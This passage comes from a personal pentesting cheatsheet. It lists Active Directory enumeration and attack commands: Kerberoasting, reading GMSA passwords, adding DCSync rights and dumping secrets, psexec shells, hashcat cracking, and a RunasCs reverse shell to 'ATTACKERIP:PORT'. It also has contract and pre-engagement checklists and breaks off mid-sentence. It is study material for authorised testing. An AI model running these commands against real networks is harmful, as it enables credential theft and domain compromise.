# Table of Contents - [Home | My Pentesting Cheatsheet](#home-my-pentesting-cheatsheet) - [Some other cool websites | My Pentesting Cheatsheet](#some-other-cool-websites-my-pentesting-cheatsheet) - [Commands Only Summary | My Pentesting Cheatsheet](#commands-only-summary-my-pentesting-cheatsheet) - [Documents | My Pentesting Cheatsheet](#documents-my-pentesting-cheatsheet) - [Contract - Checklist | My Pentesting Cheatsheet](#contract-checklist-my-pentesting-cheatsheet) - [Rules of Engagement - Checklist | My Pentesting Cheatsheet](#rules-of-engagement-checklist-my-pentesting-cheatsheet) - [Vulnerability Assessment | My Pentesting Cheatsheet](#vulnerability-assessment-my-pentesting-cheatsheet) - [Preparation | My Pentesting Cheatsheet](#preparation-my-pentesting-cheatsheet) - [Contractors Agreement - Checklist for Physical Assessments | My Pentesting Cheatsheet](#contractors-agreement-checklist-for-physical-assessments-my-pentesting-cheatsheet) - [Information Gathering | My Pentesting Cheatsheet](#information-gathering-my-pentesting-cheatsheet) - [Pentesting Machine | My Pentesting Cheatsheet](#pentesting-machine-my-pentesting-cheatsheet) - [Firewall and IDS/IPS Evasion | My Pentesting Cheatsheet](#firewall-and-ids-ips-evasion-my-pentesting-cheatsheet) - [Samba (smb) | My Pentesting Cheatsheet](#samba-smb-my-pentesting-cheatsheet) - [Footprinting | My Pentesting Cheatsheet](#footprinting-my-pentesting-cheatsheet) - [NFS | My Pentesting Cheatsheet](#nfs-my-pentesting-cheatsheet) - [Google Dorks | My Pentesting Cheatsheet](#google-dorks-my-pentesting-cheatsheet) - [DNS | My Pentesting Cheatsheet](#dns-my-pentesting-cheatsheet) - [SMTP | My Pentesting Cheatsheet](#smtp-my-pentesting-cheatsheet) - [SNMP | My Pentesting Cheatsheet](#snmp-my-pentesting-cheatsheet) - [MySQL | My Pentesting Cheatsheet](#mysql-my-pentesting-cheatsheet) - [IMAP/POP3 | My Pentesting Cheatsheet](#imap-pop3-my-pentesting-cheatsheet) - [Oracle TNS | My Pentesting Cheatsheet](#oracle-tns-my-pentesting-cheatsheet) - [MSSQL | My Pentesting Cheatsheet](#mssql-my-pentesting-cheatsheet) - [SSH | My Pentesting Cheatsheet](#ssh-my-pentesting-cheatsheet) - [Web Information Gathering | My Pentesting Cheatsheet](#web-information-gathering-my-pentesting-cheatsheet) - [IPMI | My Pentesting Cheatsheet](#ipmi-my-pentesting-cheatsheet) - [WinRM | My Pentesting Cheatsheet](#winrm-my-pentesting-cheatsheet) - [Enumeration | My Pentesting Cheatsheet](#enumeration-my-pentesting-cheatsheet) - [NMAP Scan types explained | My Pentesting Cheatsheet](#nmap-scan-types-explained-my-pentesting-cheatsheet) - [RDP | My Pentesting Cheatsheet](#rdp-my-pentesting-cheatsheet) - [Whois | My Pentesting Cheatsheet](#whois-my-pentesting-cheatsheet) - [DNS & Subdomains | My Pentesting Cheatsheet](#dns-subdomains-my-pentesting-cheatsheet) - [Crawlers | My Pentesting Cheatsheet](#crawlers-my-pentesting-cheatsheet) - [Fingerprinting | My Pentesting Cheatsheet](#fingerprinting-my-pentesting-cheatsheet) - [Vulnerability Assessment | My Pentesting Cheatsheet](#vulnerability-assessment-my-pentesting-cheatsheet) - [Automating Recon | My Pentesting Cheatsheet](#automating-recon-my-pentesting-cheatsheet) - [Email Protection | Cloudflare](#email-protection-cloudflare) - [Search Engine Discovery | My Pentesting Cheatsheet](#search-engine-discovery-my-pentesting-cheatsheet) - [File Transfers | My Pentesting Cheatsheet](#file-transfers-my-pentesting-cheatsheet) - [Catching Files over HTTP/S (Nginx) | My Pentesting Cheatsheet](#catching-files-over-http-s-nginx-my-pentesting-cheatsheet) - [Evading Detection | My Pentesting Cheatsheet](#evading-detection-my-pentesting-cheatsheet) - [Protected Files Transfer | My Pentesting Cheatsheet](#protected-files-transfer-my-pentesting-cheatsheet) - [Windows Target | My Pentesting Cheatsheet](#windows-target-my-pentesting-cheatsheet) - [Linux Target | My Pentesting Cheatsheet](#linux-target-my-pentesting-cheatsheet) - [Living Off The Land | My Pentesting Cheatsheet](#living-off-the-land-my-pentesting-cheatsheet) - [Transferring Files with Code | My Pentesting Cheatsheet](#transferring-files-with-code-my-pentesting-cheatsheet) - [Shells & Payloads | My Pentesting Cheatsheet](#shells-payloads-my-pentesting-cheatsheet) - [Miscellaneous File Transfer Methods | My Pentesting Cheatsheet](#miscellaneous-file-transfer-methods-my-pentesting-cheatsheet) - [Password Reuse / Default Passwords | My Pentesting Cheatsheet](#password-reuse-default-passwords-my-pentesting-cheatsheet) - [Reverse Shells + Bind + Web | My Pentesting Cheatsheet](#reverse-shells-bind-web-my-pentesting-cheatsheet) - [RDP | My Pentesting Cheatsheet](#rdp-my-pentesting-cheatsheet) - [Pivoting, Tunneling, and Port Forwarding | My Pentesting Cheatsheet](#pivoting-tunneling-and-port-forwarding-my-pentesting-cheatsheet) - [FTP | My Pentesting Cheatsheet](#ftp-my-pentesting-cheatsheet) - [Introduction to Hashcat | My Pentesting Cheatsheet](#introduction-to-hashcat-my-pentesting-cheatsheet) - [Remote password attacks | My Pentesting Cheatsheet](#remote-password-attacks-my-pentesting-cheatsheet) - [Playing Pong with Socat | My Pentesting Cheatsheet](#playing-pong-with-socat-my-pentesting-cheatsheet) --- # Home | My Pentesting Cheatsheet Welcome to my personal notes about pentesting tools that I use These notes are in need to be re-organized using indexes and general categories. However, at the moment they are a bit chaotic due to the fact that I'm writing these while doing the academy courses This project is maintained through Gitbook [NextCommands Only Summary](https://docs.rtlcopymemory.com/commands-only-summary) Last updated 1 year ago --- # Some other cool websites | My Pentesting Cheatsheet [![Logo](https://notes.incendium.rocks/pentesting-notes/~gitbook/image?url=https%3A%2F%2F3347686964-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252Fu7zwkkeRzjx9PZGhfY9D%252Ficon%252FJ1qkvKaguiQEEB2mxdm7%252F152051-white-hat-free-download-png-hd.png%3Falt%3Dmedia%26token%3Dbfb058f3-ea25-449d-8773-483e6a5b7d16&width=48&height=48&sign=aa098afb&sv=2)Home | Pentesting Notesnotes.incendium.rocks](https://notes.incendium.rocks/) [![Logo](https://docs.rtlcopymemory.com/~gitbook/image?url=https%3A%2F%2Fbook.hacktricks.wiki%2Fen%2Ffavicon.svg&width=20&dpr=4&quality=100&sign=852ede67&sv=2)HackTricks - HackTricksbook.hacktricks.xyz](https://book.hacktricks.xyz/) [![Logo](https://docs.rtlcopymemory.com/~gitbook/image?url=https%3A%2F%2Fs0cm0nkey.gitbook.io%2Fs0cm0nkeys-security-reference-guide%2F%7Egitbook%2Ficon%3Fsize%3Dsmall%26theme%3Dlight&width=20&dpr=4&quality=100&sign=b9d1dd13&sv=2)Attacking Active Directory | s0cm0nkey's Security Reference Guides0cm0nkey.gitbook.io](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/red-offensive/active-directory) [![Logo](https://docs.rtlcopymemory.com/~gitbook/image?url=https%3A%2F%2Fcheatsheetseries.owasp.org%2Fassets%2FWebSite_Favicon.png&width=20&dpr=4&quality=100&sign=6e34b765&sv=2)Introduction - OWASP Cheat Sheet Seriescheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/) OWASP Cheat sheet series downloaded 2025/06/02 15MB [bundle.zip](https://251353229-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIo1z7P4Rl2BT9EibHkhc%2Fuploads%2Fa1k2m1ocHCqQS3Mk1KBe%2Fbundle.zip?alt=media&token=e4d0bc33-26c1-477b-b787-d04ba35e0e75) archive Download[Open](https://251353229-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIo1z7P4Rl2BT9EibHkhc%2Fuploads%2Fa1k2m1ocHCqQS3Mk1KBe%2Fbundle.zip?alt=media&token=e4d0bc33-26c1-477b-b787-d04ba35e0e75) [PreviousCommands Only Summary](https://docs.rtlcopymemory.com/commands-only-summary) [NextPreparation](https://docs.rtlcopymemory.com/preparation) Last updated 8 months ago --- # Commands Only Summary | My Pentesting Cheatsheet * * * [](https://docs.rtlcopymemory.com/commands-only-summary#sharpview) Active Directory ---------------------------------------------------------------------------------------- ### [](https://docs.rtlcopymemory.com/commands-only-summary#sharpview-1) πŸͺŸ SharpView (C# Port of PowerView) > AD Enumeration tool. C# port of [πŸͺŸ PowerView (Now deprecated)](https://docs.rtlcopymemory.com/commands-only-summary#powerview-now-deprecated) > . Same commands #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-help-about-a-command) Get help about a command Copy .\SharpView.exe Get-DomainUser -Help #### [](https://docs.rtlcopymemory.com/commands-only-summary#enumerate-information-about-a-specific-user) Enumerate information about a specific user Copy .\SharpView.exe Get-DomainUser -Identity * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#powerview-now-deprecated) πŸͺŸ PowerView (Now deprecated) > AD Enumeration Tools #### [](https://docs.rtlcopymemory.com/commands-only-summary#import) Import Copy Import-Module ./PowerView #### [](https://docs.rtlcopymemory.com/commands-only-summary#information-for-specific-user-or-all-users) Information for specific User or All users #### [](https://docs.rtlcopymemory.com/commands-only-summary#group-specific-info) Group specific info Explaination[](https://docs.rtlcopymemory.com/commands-only-summary#explaination) `-Recurse` switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) to list out the members of those groups. #### [](https://docs.rtlcopymemory.com/commands-only-summary#enumerate-domain-trust-mappings) Enumerate domain trust mappings #### [](https://docs.rtlcopymemory.com/commands-only-summary#test-for-local-admin-access-on-either-the-current-machine-or-a-remote-one) Test for local admin access on either the current machine or a remote one #### [](https://docs.rtlcopymemory.com/commands-only-summary#check-kerberoasting-attack-possibility) Check Kerberoasting attack possibility * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#bloodhound) πŸͺŸ BloodHound #### [](https://docs.rtlcopymemory.com/commands-only-summary#collect-data) Collect data Explaination[](https://docs.rtlcopymemory.com/commands-only-summary#explaination-1) SharpHound.exe collector, needs to be ran from a domain joined PC. `-c`: (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup, Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly `--zipfilename`: Filename for the zip * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#built-in-activedirectory-powershell-module) πŸͺŸ \[Built-in\] ActiveDirectory PowerShell Module > AD Enumeration tools #### [](https://docs.rtlcopymemory.com/commands-only-summary#discover-modules) **Discover Modules** #### [](https://docs.rtlcopymemory.com/commands-only-summary#load-activedirectory-module) **Load ActiveDirectory Module** #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-domain-info) **Get Domain Info** Explaination[](https://docs.rtlcopymemory.com/commands-only-summary#explaination-2) This will print out helpful information like the domain SID, domain functional level, any child domains, and more #### [](https://docs.rtlcopymemory.com/commands-only-summary#list-accounts-that-may-be-susceptible-to-a-kerberoasting-attack) List accounts that may be susceptible to a Kerberoasting attack #### [](https://docs.rtlcopymemory.com/commands-only-summary#verify-domain-trust-relationships) Verify domain trust relationships Explaination[](https://docs.rtlcopymemory.com/commands-only-summary#explaination-3) This cmdlet will print out any trust relationships the domain has. We can determine if they are trusts within our forest or with domains in other forests, the type of trust, the direction of the trust, and the name of the domain the relationship is with. #### [](https://docs.rtlcopymemory.com/commands-only-summary#group-enumeration) **Group Enumeration** #### [](https://docs.rtlcopymemory.com/commands-only-summary#group-information) Group Information #### [](https://docs.rtlcopymemory.com/commands-only-summary#group-membership-listing) **Group Membership Listing** #### [](https://docs.rtlcopymemory.com/commands-only-summary#if-part-of-gmsa_managers-group-set-yourself-as-someone-who-can-read-the-password) If part of GMSA\_MANAGERS Group, Set yourself as someone who can read the password * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#snaffler) πŸͺŸ Snaffler > [Snaffler](https://github.com/SnaffCon/Snaffler) > is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories. Once that is done, it iterates through any directories readable by our user and hunts for files that could serve to better our position within the assessment. Snaffler requires that it be run from a domain-joined host or in a domain-user context. Explaination[](https://docs.rtlcopymemory.com/commands-only-summary#explaination-4) `-s` tells it to print results to the console. `-d` specifies the domain to search within. `-o` tells Snaffler to write results to a logfile. `-v` option is the verbosity level. * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#crackmapexec-or-netsh) 🐧 CrackMapExec (deprecated) | NetExec (updated) > A swiss army knife for pentesting networks #### [](https://docs.rtlcopymemory.com/commands-only-summary#help-for-specific-protocol) Help for specific protocol #### [](https://docs.rtlcopymemory.com/commands-only-summary#domain-user-enumeration) **Domain User Enumeration** Explaination[](https://docs.rtlcopymemory.com/commands-only-summary#explaination-5) `-u Username` The user whose credentials we will use to authenticate `-p Password` User's password `Target (IP or FQDN)` Target host to enumerate (in our case, the Domain Controller) `--users` Specifies to enumerate Domain Users `--groups` Specifies to enumerate domain groups `--loggedon-users` Attempts to enumerate what users are logged on to a target, if any #### [](https://docs.rtlcopymemory.com/commands-only-summary#domain-group-enumeration) **Domain Group Enumeration** #### [](https://docs.rtlcopymemory.com/commands-only-summary#logged-on-users) **Logged On Users** #### [](https://docs.rtlcopymemory.com/commands-only-summary#share-searching) **Share Searching** #### [](https://docs.rtlcopymemory.com/commands-only-summary#dig-through-share) Dig Through Share When completed, CME writes the results to a JSON file located at `/tmp/cme_spider_plus/` #### [](https://docs.rtlcopymemory.com/commands-only-summary#password-policy) Password Policy Use empty username and password for null authentication #### [](https://docs.rtlcopymemory.com/commands-only-summary#group-policy-password-misconfiguration-gpp-usually-to-check-if-read-access-to-sysvol) Group Policy Password misconfiguration (GPP, usually to check if read access to SYSVOL) #### [](https://docs.rtlcopymemory.com/commands-only-summary#enumerate-users-from-rid-for-when-the-users-command-doesnt-work) Enumerate users from RID (for when the --users command doesnt work) #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-gmsa-passwords) Get GMSA passwords #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-group-membership-users) Get Group membership users #### [](https://docs.rtlcopymemory.com/commands-only-summary#find-certificate-server-adcs) Find certificate server (ADCS) #### [](https://docs.rtlcopymemory.com/commands-only-summary#list-kerberoastable-users) List Kerberoastable users AS\_REP version with `--asreproast` flag * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#smbmap) 🐧 SMBMap > SMBMap is great for enumerating SMB shares from a Linux attack host. It can be used to gather a listing of shares, permissions, and share contents if accessible. #### [](https://docs.rtlcopymemory.com/commands-only-summary#smbmap-to-check-access) **SMBMap To Check Access** #### [](https://docs.rtlcopymemory.com/commands-only-summary#recursive-list-of-all-directories) **Recursive List Of All Directories** * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#smbmap-1) 🐧 rpcclient > Useful for enumeration with NULL sessions #### [](https://docs.rtlcopymemory.com/commands-only-summary#connect-to-anonymous-session) Connect to anonymous session #### [](https://docs.rtlcopymemory.com/commands-only-summary#enumerate-all-users-to-gather-the-rids) Enumerate all users to gather the RIDs #### [](https://docs.rtlcopymemory.com/commands-only-summary#user-enumeration-by-rid) **User Enumeration By RID** * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#impacket-toolkit) 🐧 Impacket Toolkit > Impacket is a versatile toolkit that provides us with many different ways to enumerate, interact, and exploit Windows protocols and find the information we need using Python. #### [](https://docs.rtlcopymemory.com/commands-only-summary#shell-on-target-device-psexec) Shell on target device (PSExec) #### [](https://docs.rtlcopymemory.com/commands-only-summary#stealthier-shell-on-target-device-wmiexec.py) Stealthier Shell on target device (**wmiexec.py**) A more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems. #### [](https://docs.rtlcopymemory.com/commands-only-summary#finding-asreproasting-targets) Finding ASREProasting targets No user specification needed #### [](https://docs.rtlcopymemory.com/commands-only-summary#edit-dacl-to-get-dcsync) Edit DACL to get DCSync target-dn is the LDAP format, like DC=htb,DC=local #### [](https://docs.rtlcopymemory.com/commands-only-summary#dcsync-attack-secretsdump) DCSync attack, secretsdump * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#windapsearch) 🐧 Windapsearch > [Windapsearch](https://github.com/ropnop/windapsearch) > is another handy Python script we can use to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries. #### [](https://docs.rtlcopymemory.com/commands-only-summary#enumerate-domain-admins) Enumerate Domain Admins #### [](https://docs.rtlcopymemory.com/commands-only-summary#enumerate-priviledged-users) Enumerate Priviledged Users * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#bloodhound.py) 🐧 Bloodhound.py > Collect data for BloodHound GUI from a Linux host #### [](https://docs.rtlcopymemory.com/commands-only-summary#ntlm-hash-instead-of-password) NTLM Hash instead of password (the NTLM hash needs to be preceded by the `:`). Use `-c all` or `-c dconly` * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#ldapsearch) 🐧 ldapsearch * `-h ` * `-x` simple authentication (anonymous) * `-s` scope (`-s base namingcontexts`). Output of this goes in the `-b` flag content * `-b` base (`-b "DC=htb,DC=local"`) (Basically the searching scope) #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-naming-context-domain-name) Get naming context (domain name) #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-anonymous-info) Get anonymous info #### [](https://docs.rtlcopymemory.com/commands-only-summary#query-for-users-object-class-of-person) Query for users (Object class of Person) Usually the class can be person, organizationalPerson or user #### [](https://docs.rtlcopymemory.com/commands-only-summary#query-for-users-and-only-show-username) Query for users and only show username (you can add more things at the end, such as `sAMAccountName userPrincipalName`) $ at the end of a user account is a machine account * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#evil-winrm) 🐧 Evil-winrm #### [](https://docs.rtlcopymemory.com/commands-only-summary#connect-with-kerberos) Connect with kerberos * * * * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#hashcat) 🐧 πŸͺŸ Hashcat #### [](https://docs.rtlcopymemory.com/commands-only-summary#secretsdump-output) secretsdump output #### [](https://docs.rtlcopymemory.com/commands-only-summary#find-hashcat-mode) Find Hashcat mode #### [](https://docs.rtlcopymemory.com/commands-only-summary#generate-password-list-from-rules) Generate password list from rules #### [](https://docs.rtlcopymemory.com/commands-only-summary#limit-length-of-passwords) Limit length of passwords Rules[](https://docs.rtlcopymemory.com/commands-only-summary#rules) #### [](https://docs.rtlcopymemory.com/commands-only-summary#cracking) Cracking #### [](https://docs.rtlcopymemory.com/commands-only-summary#password-list-gen) Password list gen #### [](https://docs.rtlcopymemory.com/commands-only-summary#hashes-in-user-hash-format-to-save-user-info) Hashes in user:hash format to save user info Put the hashes in a file in the `user:hash` format, for example for NTLM hashes then use the flag `--user` for automatically make hashcat discard that first column and use the rest as the hash. This allows to use `--show` to then recover the user of the cracked password from the potfile. * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#bloodyad) 🐧 BloodyAD > Swiss army knife for AD privilege escalation [![Logo](https://docs.rtlcopymemory.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=4&quality=100&sign=e8dfb087&sv=2)GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation FrameworkGitHub](https://github.com/CravateRouge/bloodyAD) As other tools, to use NTLM hashes on this put them in the -p password field PRECEDED by a : #### [](https://docs.rtlcopymemory.com/commands-only-summary#set-yourself-as-owner) Set yourself as owner #### [](https://docs.rtlcopymemory.com/commands-only-summary#get-writable) Get Writable #### [](https://docs.rtlcopymemory.com/commands-only-summary#add-user-to-group-genericall-over-group) Add user to group (GenericAll over group) #### [](https://docs.rtlcopymemory.com/commands-only-summary#add-dcsync-rights-to-user) Add DCSync rights to user #### [](https://docs.rtlcopymemory.com/commands-only-summary#read-gmsa-password) Read GMSA password > ReadGMSAPassword privilege abuse Following command uses `-k` for Kerberos (needs `export KRB5CCNAME=` to be set) #### [](https://docs.rtlcopymemory.com/commands-only-summary#disable-pre-authentication) Disable Pre Authentication > this makes the accounts vulnerable to asreproasting, requires GenericAll or other ways to control account #### [](https://docs.rtlcopymemory.com/commands-only-summary#enable-account) Enable account This is handy when an account is disabled but you control it through GenericAll or other write permissions * * * [](https://docs.rtlcopymemory.com/commands-only-summary#ntpdate) 🐧 ntpdate -------------------------------------------------------------------------------- > Useful to adjust the system clock to one of another machine. Solves problem like kerberos Clock skew too great Disable NTP first: Also if in a VM, check that no option to sync the time is set on your VM software. For example on VirtualBox on a Windows Host: * * * [](https://docs.rtlcopymemory.com/commands-only-summary#mounting-smb-share-auth-from-command-line) πŸͺŸ Mounting smb share (auth) from command line ------------------------------------------------------------------------------------------------------------------------------------------------------ list with * * * ### [](https://docs.rtlcopymemory.com/commands-only-summary#sharpview-2) πŸͺŸ Refreshing Privileges after privesc without closing and reopening > Useful in occasions when restarting the connection is more annoying than downloading a binary on the machine. Example is when assigning your own user to the administrators group [PreviousHome](https://docs.rtlcopymemory.com/) [NextSome other cool websites](https://docs.rtlcopymemory.com/commands-only-summary/some-other-cool-websites) Last updated 4 months ago * [Active Directory](https://docs.rtlcopymemory.com/commands-only-summary#sharpview) * [πŸͺŸ SharpView (C# Port of PowerView)](https://docs.rtlcopymemory.com/commands-only-summary#sharpview-1) * [πŸͺŸ PowerView (Now deprecated)](https://docs.rtlcopymemory.com/commands-only-summary#powerview-now-deprecated) * [πŸͺŸ BloodHound](https://docs.rtlcopymemory.com/commands-only-summary#bloodhound) * [πŸͺŸ \[Built-in\] ActiveDirectory PowerShell Module](https://docs.rtlcopymemory.com/commands-only-summary#built-in-activedirectory-powershell-module) * [πŸͺŸ Snaffler](https://docs.rtlcopymemory.com/commands-only-summary#snaffler) * [🐧 CrackMapExec (deprecated) | NetExec (updated)](https://docs.rtlcopymemory.com/commands-only-summary#crackmapexec-or-netsh) * [🐧 SMBMap](https://docs.rtlcopymemory.com/commands-only-summary#smbmap) * [🐧 rpcclient](https://docs.rtlcopymemory.com/commands-only-summary#smbmap-1) * [🐧 Impacket Toolkit](https://docs.rtlcopymemory.com/commands-only-summary#impacket-toolkit) * [🐧 Windapsearch](https://docs.rtlcopymemory.com/commands-only-summary#windapsearch) * [🐧 Bloodhound.py](https://docs.rtlcopymemory.com/commands-only-summary#bloodhound.py) * [🐧 ldapsearch](https://docs.rtlcopymemory.com/commands-only-summary#ldapsearch) * [🐧 Evil-winrm](https://docs.rtlcopymemory.com/commands-only-summary#evil-winrm) * [🐧 πŸͺŸ Hashcat](https://docs.rtlcopymemory.com/commands-only-summary#hashcat) * [🐧 BloodyAD](https://docs.rtlcopymemory.com/commands-only-summary#bloodyad) * [🐧 ntpdate](https://docs.rtlcopymemory.com/commands-only-summary#ntpdate) * [πŸͺŸ Mounting smb share (auth) from command line](https://docs.rtlcopymemory.com/commands-only-summary#mounting-smb-share-auth-from-command-line) * [πŸͺŸ Refreshing Privileges after privesc without closing and reopening](https://docs.rtlcopymemory.com/commands-only-summary#sharpview-2) Copy Get-DomainUser -Identity -Domain | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol Copy Get-DomainGroupMember -Identity "Domain Admins" -Recurse Copy Get-DomainTrustMapping Copy Test-AdminAccess -ComputerName ACADEMY-EA-MS01 Copy Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName Copy .\SharpHound.exe -c All --zipfilename Copy Get-Module Copy Import-Module ActiveDirectory Copy Get-ADDomain Copy Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName Copy Get-ADTrust -Filter * Copy Get-ADGroup -Filter * | select name Copy Get-ADGroup -Identity "Backup Operators" Copy Get-ADGroupMember -Identity "Backup Operators" Copy Set-ADServiceAccount -Identity "target$" -PrincipalsAllowedToRetrieveManagedPassword "yourUser" Copy Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data Copy crackmapexec smb -h Copy sudo crackmapexec smb -u -p --users Copy sudo crackmapexec smb -u -p --groups Copy sudo crackmapexec smb -u -p --loggedon-users Copy sudo crackmapexec smb -u -p --shares Copy sudo crackmapexec smb -u -p -M spider_plus --share '' Copy sudo crackmapexec smb --pass-pol -u -p Copy sudo crackmapexec smb IP -u username -p password -M gpp_autologin Copy sudo crackmapexec smb IP -u 'user' -p 'pass' --rid-brute | grep 'SidTypeUser' Copy sudo netexec ldap IP -u 'user' -p 'password' --gmsa Copy sudo netexec smb DCIP -u 'USER' -p 'PASSWORD' --groups "GROUP" Copy sudo netexec ldap DCIP -u 'USER' -p 'PASSWORD' -M adcs Copy sudo netexec ldap DCIP -u USER -p PASS --kerberoasting output.txt Copy smbmap -u -p -d -H Copy smbmap -u -p -d -H -R 'Department Shares' --dir-only Copy rpcclient -U '' IP Copy rpcclient $> enumdomusers Copy rpcclient $> queryuser 0x457 Copy psexec.py :''@ Copy wmiexec.py :''@ -u @ -p --da Copy python3 windapsearch.py --dc-ip -u @ -p -PU Copy sudo bloodhound-python -u '' -p '' -ns -d -c all --zip Copy bloodhound-python -d DOMAIN -u 'USER' --hashes ':NTLM_HASH' -dc DC_FQDM -ns DCIP --zip -c all Copy ldapsearch -h IP -x -s base namingcontexts Copy ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" Copy ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" '(objectClass=Person)' Copy ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" '(objectClass=Person)' sAMAccountName Copy impacket-getTGT DOMAIN/'USER':'PASSWORD' -dc-ip DCIP export KRB5CCNAME=USER.ccache Copy evil-winrm -i TARGETIP -r DOMAIN -k USER.ccache Copy hashcat -m 5600 Copy cat dc_hash.txt | awk -F: '{print($1":"$4)}' Copy hashcat -m 1000 --user file wordlist Copy hashcat --example-hashes | grep -B 2 Copy hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles.rule | sort -u Copy awk 'length($0) > 7' Copy /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule Copy /usr/share/hashcat/rules/best64.rule Copy /usr/share/hashcat/rules/toggles.rule Copy bloodyAD --host "DCIP" -d "DOMAIN" -u "YOURACCOUNT" -p ":HASH" set owner GROUP YourAccount Copy bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' get writable --detail Copy bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add groupMember "GROUP" USER Copy bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add dcsync "TARGETUSER" Copy bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k get object 'TARGET' --attr msDS-ManagedPassword Copy bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k add uac TARGET -f DONT_REQ_PREAUTH Copy bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k remove uac TARGET -f ACCOUNTDISABLE Copy sudo apt install ntpdate Copy sudo ntpdate Copy sudo timedatectl set-ntp off Copy cd "C:\Program Files\Oracle\VirtualBox" .\VBoxManage.exe setextradata "Kali" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1 Copy net use K: \\IP\share /user:username password Copy net use Copy .\RunasCs.exe USER PASSWORD powershell -r ATTACKERIP:PORT --- # Documents | My Pentesting Cheatsheet **Document** **Timing for Creation** `1. Non-Disclosure Agreement` (`NDA`) `After` Initial Contact `2. Scoping Questionnaire` `Before` the Pre-Engagement Meeting `3. Scoping Document` `During` the Pre-Engagement Meeting `4. Penetration Testing Proposal` (`Contract/Scope of Work` (`SoW`)) `During` the Pre-engagement Meeting `5. Rules of Engagement` (`RoE`) `Before` the Kick-Off Meeting `6. Contractors Agreement` (Physical Assessments) `Before` the Kick-Off Meeting `7. Reports` [PreviousPreparation](https://docs.rtlcopymemory.com/preparation) [NextContract - Checklist](https://docs.rtlcopymemory.com/preparation/contract-checklist) Last updated 1 year ago --- # Contract - Checklist | My Pentesting Cheatsheet **Checkpoint** **Description** `☐ NDA` Non-Disclosure Agreement (NDA) refers to a secrecy contract between the client and the contractor regarding all written or verbal information concerning an order/project. The contractor agrees to treat all confidential information brought to its attention as strictly confidential, even after the order/project is completed. Furthermore, any exceptions to confidentiality, the transferability of rights and obligations, and contractual penalties shall be stipulated in the agreement. The NDA should be signed before the kick-off meeting or at the latest during the meeting before any information is discussed in detail. `☐ Goals` Goals are milestones that must be achieved during the order/project. In this process, goal setting is started with the significant goals and continued with fine-grained and small ones. `☐ Scope` The individual components to be tested are discussed and defined. These may include domains, IP ranges, individual hosts, specific accounts, security systems, etc. Our customers may expect us to find out one or the other point by ourselves. However, the legal basis for testing the individual components has the highest priority here. `☐ Penetration Testing Type` When choosing the type of penetration test, we present the individual options and explain the advantages and disadvantages. Since we already know the goals and scope of our customers, we can and should also make a recommendation on what we advise and justify our recommendation accordingly. Which type is used in the end is the client's decision. `☐ Methodologies` Examples: OSSTMM, OWASP, automated and manual unauthenticated analysis of the internal and external network components, vulnerability assessments of network components and web applications, vulnerability threat vectorization, verification and exploitation, and exploit development to facilitate evasion techniques. `☐ Penetration Testing Locations` External: Remote (via secure VPN) and/or Internal: Internal or Remote (via secure VPN) `☐ Time Estimation` For the time estimation, we need the start and the end date for the penetration test. This gives us a precise time window to perform the test and helps us plan our procedure. It is also vital to explicitly ask how time windows the individual attacks (Exploitation / Post-Exploitation / Lateral Movement) are to be carried out. These can be carried out during or outside regular working hours. When testing outside regular working hours, the focus is more on the security solutions and systems that should withstand our attacks. `☐ Third Parties` For the third parties, it must be determined via which third-party providers our customer obtains services. These can be cloud providers, ISPs, and other hosting providers. Our client must obtain written consent from these providers describing 